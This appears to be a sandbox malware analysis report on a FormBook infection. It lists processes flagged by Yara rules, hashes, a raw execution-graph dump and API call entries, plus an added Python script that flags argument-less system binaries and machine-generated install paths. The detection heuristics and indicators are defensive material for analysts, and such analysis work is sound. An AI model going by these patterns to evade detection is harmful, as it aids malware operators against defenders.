                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:7
                                              Start time:10:39:07
                                              Start date:03/07/2024
                                              Path:C:\Windows\SysWOW64\findstr.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\findstr.exe"
                                              Imagebase:0x190000
                                              File size:29'696 bytes
                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:8
                                              Start time:10:39:20
                                              Start date:03/07/2024
                                              Path:C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe"
                                              Imagebase:0xdf0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:11
                                              Start time:10:39:36
                                              Start date:03/07/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff79f9e0000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true
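
Two things in the process list above are worth turning into detection logic: a 32-bit system binary (findstr.exe from SysWOW64) started with a command line that is nothing but its own path, and a second executable under Program Files (x86) whose directory and file names look machine-generated. The script below is an added example, not part of this Joe Sandbox report or of any Joe Security tooling; the record schema (ProcessEvent), the list of argument-less suspects and the two heuristic thresholds are this example's own assumptions. The sample events are constructed from the Path, Commandline and Wow64 fields of Target IDs 7, 8 and 11 as shown above.

```python
"""Flag argument-less system binaries and machine-generated install paths.

Added example for the process list above; not Joe Sandbox code. The event
schema, the ARGLESS_SUSPECTS set and the thresholds are assumptions.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath

# System binaries with no sensible argument-less use. An empty command line
# is consistent with a process created only to host injected code.
# Assumption of this example; extend with your own list.
ARGLESS_SUSPECTS = {"findstr.exe", "rundll32.exe", "regsvr32.exe", "svchost.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    target_id: int
    image: str      # full image path as reported
    cmdline: str    # raw command line as reported
    wow64: bool     # 32-bit process on 64-bit Windows


def has_no_arguments(ev: ProcessEvent) -> bool:
    """True when the command line is only the (possibly quoted) image path.
    Compared case-insensitively: the report shows 'Firefox.exe' vs 'firefox.exe'."""
    cmd = ev.cmdline.strip().strip('"').casefold()
    return cmd == ev.image.casefold()


def looks_machine_generated(name: str) -> bool:
    """Heuristic for names like 'pMYZJWoDTJXnmaTJMCEeAnzIbNV': long, letters
    only, frequent upper/lower case flips and few vowels. Real product names
    ('MicrosoftEdgeUpdate') flip case rarely and are vowel-rich. Thresholds
    (16 chars, 30% flips, <30% vowels) are assumptions of this example."""
    if len(name) < 16 or not name.isalpha():
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    vowels = sum(1 for c in name.casefold() if c in "aeiou")
    return flips / (len(name) - 1) >= 0.3 and vowels / len(name) < 0.3


def suspicious_path_components(image: str) -> list[str]:
    """Directory names and the file stem of `image` that look machine-generated."""
    p = PureWindowsPath(image)
    parts = list(p.parts[1:-1]) + [p.stem]   # skip the drive, drop '.exe'
    return [part for part in parts if looks_machine_generated(part)]


def triage(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Return {target_id: [reasons]} for every event matching either pattern."""
    findings: dict[int, list[str]] = {}
    for ev in events:
        reasons = []
        exe = PureWindowsPath(ev.image).name.casefold()
        if exe in ARGLESS_SUSPECTS and has_no_arguments(ev):
            note = " (WOW64 32-bit process)" if ev.wow64 else ""
            reasons.append(f"{exe} started with no arguments{note}")
        odd = suspicious_path_components(ev.image)
        if odd:
            reasons.append("machine-generated path component(s): " + ", ".join(odd))
        if reasons:
            findings[ev.target_id] = reasons
    return findings


# Constructed from the Path / Commandline / Wow64 fields of Target IDs 7, 8, 11.
RANDOM_DIR = "IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei"
RANDOM_EXE = "pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe"
SAMPLE_EVENTS = [
    ProcessEvent(7, r"C:\Windows\SysWOW64\findstr.exe",
                 r'"C:\Windows\SysWOW64\findstr.exe"', True),
    ProcessEvent(8, rf"C:\Program Files (x86)\{RANDOM_DIR}\{RANDOM_EXE}",
                 rf'"C:\Program Files (x86)\{RANDOM_DIR}\{RANDOM_EXE}"', True),
    ProcessEvent(11, r"C:\Program Files\Mozilla Firefox\firefox.exe",
                 r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', False),
]

if __name__ == "__main__":
    for tid, reasons in triage(SAMPLE_EVENTS).items():
        print(f"Target ID {tid}:")
        for reason in reasons:
            print("  -", reason)
```

Run against the three sample events, Target ID 7 is flagged for the argument-less findstr.exe launch, Target ID 8 for both its directory and file name, and firefox.exe (Target ID 11) is not flagged even though it also ran without arguments, because it is not in the suspect list. Neither heuristic is proof of injection on its own; pair them with the memory-region Yara hits listed per process above.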


                                                Execution Graph

                                                Execution Coverage:5.9%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:25.6%
                                                Total number of Nodes:924
                                                Total number of Limit Nodes:25
execution_graph: the raw node/edge list of the interactive execution graph was emitted here as text (numeric node IDs, code addresses in the 0x7ff6585... to 0x7ff6586... range, and the API names resolved at each node); the listing is cut off at the end of the page.

API calls named in the graph data: EnterCriticalSection, LeaveCriticalSection, VirtualFree, VirtualAlloc, GetCurrentProcess, VirtualAllocExNuma, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, GetLastError, RaiseFailFastException, Sleep, FlsGetValue, FlsSetValue, GetStdHandle, WriteFile, SetLastError, malloc, std::bad_alloc::bad_alloc, Concurrency::cancel_current_task, RtlPcToFileHeader, RaiseException, _swprintf_c_l, GetCurrentThreadId, GetTickCount64, WaitForSingleObject, SleepEx, SwitchToThread, DebugBreak, GlobalMemoryStatusEx, FlsAlloc, GetModuleHandleExW, RtlAddVectoredExceptionHandler, GetEnabledXStateFeatures, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, GetProcessAffinityMask, QueryInformationJobObject, GetSystemInfo, GetNumaHighestNodeNumber, GetProcessGroupAffinity, GetLogicalProcessorInformationEx, strcmp, _stricmp, strtoull, CreateEventW, CreateThread, SetThreadPriority, ResumeThread, FindCloseChangeNotification, VirtualUnlock, QueryPerformanceCounter, SetEvent, ResetEvent, FlushProcessWriteBuffers, LoadLibraryExW, GetProcAddress, SuspendThread, GetThreadContext, VerSetConditionMask, VerifyVersionInfoW, IsProcessInJob, InitializeCriticalSection.
7ff6585629c1 VirtualFree 16218->16220 16219->16199 16220->16199 16221->16201 16223 7ff658592def 16222->16223 16224 7ff658592e12 16223->16224 16225 7ff658592e1c 16223->16225 16230 7ff658592e47 16223->16230 16292 7ff658562b30 16224->16292 16226 7ff658562ab0 3 API calls 16225->16226 16229 7ff658592e2d 16226->16229 16229->16230 16303 7ff658562a90 VirtualFree 16229->16303 16230->16204 16234 7ff65858239f 16232->16234 16235 7ff6585823bb 16234->16235 16304 7ff658562020 16234->16304 16235->16206 16237 7ff658582b85 16236->16237 16238 7ff658582b89 16237->16238 16242 7ff658582ba3 16237->16242 16239 7ff6585b0c20 8 API calls 16238->16239 16240 7ff658582b9b 16239->16240 16240->16210 16241 7ff658582bee EnterCriticalSection 16241->16242 16242->16241 16243 7ff658582c2e LeaveCriticalSection 16242->16243 16244 7ff658582d39 LeaveCriticalSection 16242->16244 16247 7ff658582c7f 16242->16247 16248 7ff658582d18 EnterCriticalSection 16242->16248 16245 7ff6585629e0 3 API calls 16243->16245 16244->16247 16251 7ff658582d4e 16244->16251 16245->16242 16246 7ff6585b0c20 8 API calls 16249 7ff658582d10 16246->16249 16247->16246 16248->16244 16249->16210 16251->16247 16252 7ff658582d73 EnterCriticalSection LeaveCriticalSection 16251->16252 16311 7ff658562a70 VirtualFree 16251->16311 16252->16251 16312 7ff658595930 16253->16312 16256 7ff658581d80 16259 7ff658581de8 16256->16259 16257 7ff658582344 16330 7ff658561ec0 CloseHandle 16257->16330 16258 7ff658582350 16261 7ff658582359 16258->16261 16262 7ff658582365 16258->16262 16289 7ff658581e11 16259->16289 16316 7ff658561f60 16259->16316 16331 7ff658561ec0 CloseHandle 16261->16331 16262->16217 16265 7ff658581e52 16266 7ff658561f60 4 API calls 16265->16266 16265->16289 16267 7ff658581e68 _swprintf_c_l 16266->16267 16268 7ff658562140 10 API calls 16267->16268 16267->16289 16269 7ff658582176 16268->16269 16270 7ff658561f60 4 API calls 16269->16270 16271 7ff6585821ee 16270->16271 16272 7ff658582230 16271->16272 16273 7ff658561f60 4 API calls 16271->16273 
16274 7ff6585822fc 16272->16274 16275 7ff6585822f0 16272->16275 16272->16289 16279 7ff658582204 16273->16279 16277 7ff658582305 16274->16277 16278 7ff658582311 16274->16278 16326 7ff658561ec0 CloseHandle 16275->16326 16327 7ff658561ec0 CloseHandle 16277->16327 16281 7ff65858231a 16278->16281 16282 7ff658582326 16278->16282 16279->16272 16321 7ff658561ee0 16279->16321 16328 7ff658561ec0 CloseHandle 16281->16328 16284 7ff65858232f 16282->16284 16282->16289 16329 7ff658561ec0 CloseHandle 16284->16329 16287 7ff65858221a 16287->16272 16288 7ff658561f60 4 API calls 16287->16288 16288->16272 16289->16257 16289->16258 16290 7ff6585822cf 16289->16290 16290->16217 16291->16217 16293 7ff658562bf6 GetLargePageMinimum 16292->16293 16294 7ff658562b5e LookupPrivilegeValueW 16292->16294 16295 7ff658562c16 VirtualAlloc 16293->16295 16296 7ff658562c33 GetCurrentProcess VirtualAllocExNuma 16293->16296 16297 7ff658562b7a GetCurrentProcess OpenProcessToken 16294->16297 16298 7ff658562c2f 16294->16298 16295->16298 16296->16298 16297->16298 16299 7ff658562bb1 AdjustTokenPrivileges GetLastError CloseHandle 16297->16299 16300 7ff6585b0c20 8 API calls 16298->16300 16299->16298 16301 7ff658562beb 16299->16301 16302 7ff658562c66 16300->16302 16301->16293 16301->16298 16302->16229 16303->16230 16305 7ff658562028 16304->16305 16306 7ff658562041 GetLogicalProcessorInformation 16305->16306 16310 7ff65856206d 16305->16310 16307 7ff658562062 GetLastError 16306->16307 16308 7ff658562074 16306->16308 16307->16308 16307->16310 16309 7ff6585620b1 GetLogicalProcessorInformation 16308->16309 16308->16310 16309->16310 16310->16235 16311->16251 16313 7ff658595949 16312->16313 16315 7ff658582b02 16312->16315 16314 7ff658595960 GetEnabledXStateFeatures 16313->16314 16313->16315 16314->16315 16315->16256 16317 7ff6585b0c40 _swprintf_c_l 3 API calls 16316->16317 16318 7ff658561f86 16317->16318 16319 7ff658561f8e CreateEventW 16318->16319 16320 7ff658561fb0 16318->16320 16319->16320 16320->16265 16322 
7ff6585b0c40 _swprintf_c_l 3 API calls 16321->16322 16323 7ff658561f06 16322->16323 16324 7ff658561f0e CreateEventW 16323->16324 16325 7ff658561f2e 16323->16325 16324->16325 16325->16287 16326->16274 16327->16278 16328->16282 16329->16289 16330->16258 16331->16262 16332 7ff65856e731 16333 7ff65856e750 16332->16333 16334 7ff65856e832 16333->16334 16336 7ff65856e7b2 16333->16336 16358 7ff658587780 16334->16358 16346 7ff65856e6f2 16336->16346 16349 7ff65856f3d0 16336->16349 16338 7ff65856e8d4 16339 7ff65856ed80 3 API calls 16338->16339 16343 7ff65856e8ec 16339->16343 16340 7ff65856e839 16341 7ff658593070 14 API calls 16340->16341 16348 7ff65856e888 16340->16348 16344 7ff65856e86b 16341->16344 16342 7ff65856e7ff 16343->16346 16344->16346 16347 7ff658587780 GetTickCount64 16344->16347 16344->16348 16345 7ff658593140 WaitForSingleObject 16345->16346 16346->16342 16346->16345 16347->16348 16348->16336 16348->16338 16348->16346 16350 7ff65856f412 16349->16350 16351 7ff65856f4e5 16350->16351 16352 7ff65856f4a6 16350->16352 16353 7ff65856f4f7 16350->16353 16351->16346 16355 7ff65856f4b5 SwitchToThread 16352->16355 16353->16351 16354 7ff6585683d0 WaitForSingleObject 16353->16354 16356 7ff65856f4c3 16354->16356 16355->16356 16356->16351 16357 7ff65857c120 3 API calls 16356->16357 16357->16351 16359 7ff6585877c2 16358->16359 16360 7ff65858779e 16358->16360 16359->16360 16361 7ff6585877e6 GetTickCount64 16359->16361 16360->16340 16361->16360 16362 7ff658551cb0 16363 7ff658551ce0 16362->16363 16364 7ff658551d78 16363->16364 16365 7ff65856899b 18 API calls 16363->16365 16366 7ff658568939 3 API calls 16363->16366 16365->16364 16366->16364 16367 7ff658554070 16368 7ff658557580 9 API calls 16367->16368 16369 7ff658554082 16368->16369 16372 7ff6585f5460 16369->16372 16373 7ff658553200 16 API calls 16372->16373 16374 7ff6585f5481 16373->16374 16379 7ff6585e1a00 16374->16379 16376 7ff6585f5486 16382 7ff6585541d0 16376->16382 16387 7ff6585541a0 16376->16387 16391 7ff6585e1b50 
16379->16391 16381 7ff6585e1a10 16381->16376 16384 7ff6585541e0 16382->16384 16383 7ff6585541ec WaitForSingleObjectEx 16383->16384 16386 7ff658554224 16383->16386 16384->16383 16385 7ff658554215 16384->16385 16385->16376 16386->16376 16388 7ff6585541b6 16387->16388 16389 7ff658560b8a 16388->16389 16390 7ff658560b91 SetEvent 16388->16390 16389->16376 16390->16376 16392 7ff6585e1b7c 16391->16392 16393 7ff6585e1bc2 CoInitializeEx 16392->16393 16397 7ff6585e1bee 16392->16397 16394 7ff6585e1bd9 16393->16394 16395 7ff6585e1bdd 16394->16395 16398 7ff6585e1bf0 16394->16398 16395->16397 16403 7ff6585e1c70 16395->16403 16397->16381 16398->16397 16399 7ff6585e1c4e 16398->16399 16400 7ff6585547e0 26 API calls 16398->16400 16401 7ff6585547e0 26 API calls 16399->16401 16400->16399 16402 7ff6585e1c6e 16401->16402 16405 7ff6585e1c96 16403->16405 16404 7ff6585e1cd7 16404->16397 16405->16404 16406 7ff6585e1cc9 CoUninitialize 16405->16406 16406->16404

                                                Control-flow Graph

                                                APIs
                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF65856276F
                                                • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627AD
                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627D9
                                                • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627EA
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627F9
                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF658562890
                                                • GetProcessAffinityMask.KERNEL32 ref: 00007FF6585628A3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                                                • String ID:
                                                • API String ID: 580471860-0
                                                • Opcode ID: 45801e776555b8e194c9aa2d1e16ed710466e2a1524dc6a719c278de692efd2d
                                                • Instruction ID: 72c84357357c220b612446e5e999be05322ba0187539f37882a4675378efe4d5
                                                • Opcode Fuzzy Hash: 45801e776555b8e194c9aa2d1e16ed710466e2a1524dc6a719c278de692efd2d
                                                • Instruction Fuzzy Hash: 61515C71A5874686EB808F36E8041A867A1FF95B80F8C0032D95EE7B64DF3CE544CB18

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00007FF65855CCC0: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF658557D0F,?,?,?,?,?,?,00007FF658551C00), ref: 00007FF65855CCCB
                                                  • Part of subcall function 00007FF65855CCC0: QueryInformationJobObject.KERNEL32 ref: 00007FF65855CD9E
                                                  • Part of subcall function 00007FF65855CA50: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF658557D38,?,?,?,?,?,?,00007FF658551C00), ref: 00007FF65855CA61
                                                • RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF658557D99
                                                • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF658551C00), ref: 00007FF658557E83
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Exception$AllocFailFastHandleHandlerInformationModuleObjectQueryRaiseVectored
                                                • String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
                                                • API String ID: 2052584837-2841289747
                                                • Opcode ID: f2b9abe9ea48f1f248b00dabf98db4d072048249cb7df99e1d28330ab400daa0
                                                • Instruction ID: c3def73b2a30bb03d6982df53786d852ccf9ca05926342ce1605961773c22870
                                                • Opcode Fuzzy Hash: f2b9abe9ea48f1f248b00dabf98db4d072048249cb7df99e1d28330ab400daa0
                                                • Instruction Fuzzy Hash: EA416732E0974282EB91AB71A9426B86791AF41784F4C4031ED4DB7E9ADF2CF946C718

                                                Control-flow Graph

                                                APIs
                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6585B0C49,?,?,?,?,00007FF65855E371,?,?,?,00007FF65855E8F4,00000000,00000020,?), ref: 00007FF6585B155E
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6585B1574
                                                  • Part of subcall function 00007FF6585B19A4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6585B19AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                                                • String ID:
                                                • API String ID: 205171174-0
                                                • Opcode ID: 27e6cda894de4fa0304efac44748c012d57ffdf58763d5e7702285d7d28e6379
                                                • Instruction ID: 0dc247c763144935f773c1e55f34c5909c322e7b5a39a8c4ef5c46f990661b07
                                                • Opcode Fuzzy Hash: 27e6cda894de4fa0304efac44748c012d57ffdf58763d5e7702285d7d28e6379
                                                • Instruction Fuzzy Hash: 4E81CF72F8CB0289F795DF39E85127836A1AB24365F484639D92EE7FD5CE3C91408708

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CurrentProcess
                                                • String ID: PA*
                                                • API String ID: 2050909247-2703507504
                                                • Opcode ID: f0dfdf7af6af81cb248c0b7d5687ff178028e7272b22a3959eccb5cdaccec322
                                                • Instruction ID: ec70ed04b28e615c60261fd775b9c0e668c0ce7944ff44eb69ac52239859a160
                                                • Opcode Fuzzy Hash: f0dfdf7af6af81cb248c0b7d5687ff178028e7272b22a3959eccb5cdaccec322
                                                • Instruction Fuzzy Hash: 8D02C461E6864686FA95CB39AC5067C77A2BF45790F6C4636C50EF3E60EF3CB441CA08
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31edfffabc7a86aa6bd26bd54ab78c534c3898e51446dfa74989900a2a1d072c
                                                • Instruction ID: 86ae8466634448a98bcd9c20adfccc91d5b97662ea7b241713606fb4597eaeda
                                                • Opcode Fuzzy Hash: 31edfffabc7a86aa6bd26bd54ab78c534c3898e51446dfa74989900a2a1d072c
                                                • Instruction Fuzzy Hash: 16F1B521D6DB4345F681EB35AD1117CA7627FA5380F5C8336D50EF1EA2EF2CB5918608

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                                                • String ID: @$@$@
                                                • API String ID: 2645093340-1177533131
                                                • Opcode ID: 24ec87d12b26eb49bf664ef79eb868f4d5178a434dc5e340da1fb202b067f73e
                                                • Instruction ID: e23768a76e45fd07abff0fa66d4e71b8e4bf824bd82f315a7d20a65042ca374a
                                                • Opcode Fuzzy Hash: 24ec87d12b26eb49bf664ef79eb868f4d5178a434dc5e340da1fb202b067f73e
                                                • Instruction Fuzzy Hash: 38414236609AD1C5EBB18F21E4543A9B3A0FB84B60F984235DBAD97ED8DF3CD4448B04

                                                Control-flow Graph

                                                APIs
                                                • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF658557D0F,?,?,?,?,?,?,00007FF658551C00), ref: 00007FF65855CCCB
                                                  • Part of subcall function 00007FF658562760: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF65856276F
                                                  • Part of subcall function 00007FF658562760: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627AD
                                                  • Part of subcall function 00007FF658562760: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627D9
                                                  • Part of subcall function 00007FF658562760: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627EA
                                                  • Part of subcall function 00007FF658562760: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627F9
                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF658557D0F,?,?,?,?,?,?,00007FF658551C00), ref: 00007FF65855CD3D
                                                • GetProcessAffinityMask.KERNEL32 ref: 00007FF65855CD50
                                                • QueryInformationJobObject.KERNEL32 ref: 00007FF65855CD9E
                                                Similarity
                                                • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
                                                • String ID: PROCESSOR_COUNT
                                                • API String ID: 1701933505-4048346908
                                                • Opcode ID: df59b9fccf507002a6fc365712127db3b91d70bddeca77e829d668f229e319f7
                                                • Instruction ID: dcaf70c88390b551d8c6018fd00588729972d21cb884793113bd6aa41eee3f4c
                                                • Opcode Fuzzy Hash: df59b9fccf507002a6fc365712127db3b91d70bddeca77e829d668f229e319f7
                                                • Instruction Fuzzy Hash: 3C31A231A19B8282EBA49B70D4903BD67A1EF44748F5C0031D68EE7E99DF3CE809D748

                                                Control-flow Graph

                                                Strings
                                                • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF6585532F6
                                                Similarity
                                                • API ID: ExceptionFailFastRaise$Sleep
                                                • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                                                • API String ID: 3706814929-926682358
                                                • Opcode ID: c6802e911c5ebcfe0a1351dc388af011cb9ccf6ec17774bc3a49ecfdbf353aa5
                                                • Instruction ID: 2042e7406151752141e8f5634a2075967b1d6500bc2da0c2d44004589062021d
                                                • Opcode Fuzzy Hash: c6802e911c5ebcfe0a1351dc388af011cb9ccf6ec17774bc3a49ecfdbf353aa5
                                                • Instruction Fuzzy Hash: EC413931A09B4286EBE19B35F4503B923A1EF55784F0C4039CA0DE7BA1CF3EE655C688

                                                Control-flow Graph

                                                Similarity
                                                • API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
                                                • String ID:
                                                • API String ID: 2150560229-0
                                                • Opcode ID: 4a56b605204c313bed2949cdee0fbdf40efa17fe1b8a4b6ea1de50fcfb5e3b56
                                                • Instruction ID: bf242928971a0d85dc64ea61ada31f696a8bb40937b2ca86e71c0c78a7d5fb59
                                                • Opcode Fuzzy Hash: 4a56b605204c313bed2949cdee0fbdf40efa17fe1b8a4b6ea1de50fcfb5e3b56
                                                • Instruction Fuzzy Hash: 53E092A9E15712C2FB149B31B8183395360BF98B85F5C4134DE5F56BA0EF3C9145DA08

                                                Control-flow Graph

                                                [Control-flow graph of the function at 7ff658562140, which calls GetCurrentProcess and GlobalMemoryStatusEx; legend: Executed / Not Executed]
                                                Similarity
                                                • API ID: CurrentGlobalMemoryProcessStatus
                                                • String ID: @
                                                • API String ID: 3261791682-2766056989
                                                • Opcode ID: 28461a306fc3374e589f1644d5753cbf3d64b28f9de3a6a1dcdcbb79d88f20ec
                                                • Instruction ID: b4b5d1d1cd60c52157aeec61c7db22df3c16c8ba35cc82b7ddff962bbcb53bb2
                                                • Opcode Fuzzy Hash: 28461a306fc3374e589f1644d5753cbf3d64b28f9de3a6a1dcdcbb79d88f20ec
                                                • Instruction Fuzzy Hash: E141D461B09B4641EE96CA37911033996926F5ABC0F5CC731DD1EB6F48FF3DE4818604

                                                Control-flow Graph

                                                Similarity
                                                • API ID: Count64Tick
                                                • String ID: D)
                                                • API String ID: 1927824332-848725745
                                                • Opcode ID: b9fe4c2506f08c6a26c8c4dd7f3f4db5274bf5845df2519089e1e6bba78dcdb3
                                                • Instruction ID: 5789409cc559653d3b4c5e99e70a16168e16dce1b5b40fda5a1f7c7684250666
                                                • Opcode Fuzzy Hash: b9fe4c2506f08c6a26c8c4dd7f3f4db5274bf5845df2519089e1e6bba78dcdb3
                                                • Instruction Fuzzy Hash: B3416A31E1CA4285FAA59B36A84627963A1AF00B94F0C8536CD4EF3FA5DF3DE441C319

                                                Control-flow Graph

